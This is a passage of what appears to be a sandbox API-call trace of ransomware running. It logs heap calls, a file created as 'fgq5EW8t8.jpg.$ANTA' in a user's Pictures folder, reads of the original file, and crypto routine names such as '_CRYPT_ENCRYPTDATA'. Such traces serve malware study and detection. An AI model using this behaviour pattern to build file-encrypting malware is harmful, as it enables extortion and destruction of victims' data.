lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0093.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0093.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0093.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0093.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.979] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0093.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0093.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0093.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0093.980] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0093.980] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0093.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0093.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.980] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d938 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0093.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d938 | out: hHeap=0x1780000) returned 1 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0093.982] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369e20 | out: hHeap=0x1780000) returned 1 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0093.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0093.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.982] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\fgq5EW8t8.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\fgq5ew8t8.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0093.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0093.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0093.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.983] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0093.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0093.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0093.984] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0093.984] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0093.984] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0093.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.984] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.985] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.985] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0093.989] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0093.989] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x244f, lpOverlapped=0x0) returned 1 [0093.989] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0093.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.989] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.989] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.990] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x244f) returned 0x4516010 [0093.990] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0093.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0093.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x244f) returned 0x4518468 [0093.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.993] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.993] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0093.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0093.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.993] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x244f) returned 0x4516010 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.994] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0093.994] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0093.994] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0093.994] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.994] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x244f) returned 0x4516010 [0093.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.995] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0093.995] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x244f) returned 0x451a8c0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0093.996] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0093.996] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0093.996] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0093.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0093.997] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0093.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0093.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0093.997] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0093.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0093.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.997] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0093.997] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0093.998] HeapFree (in: hHeap=0x1780000, 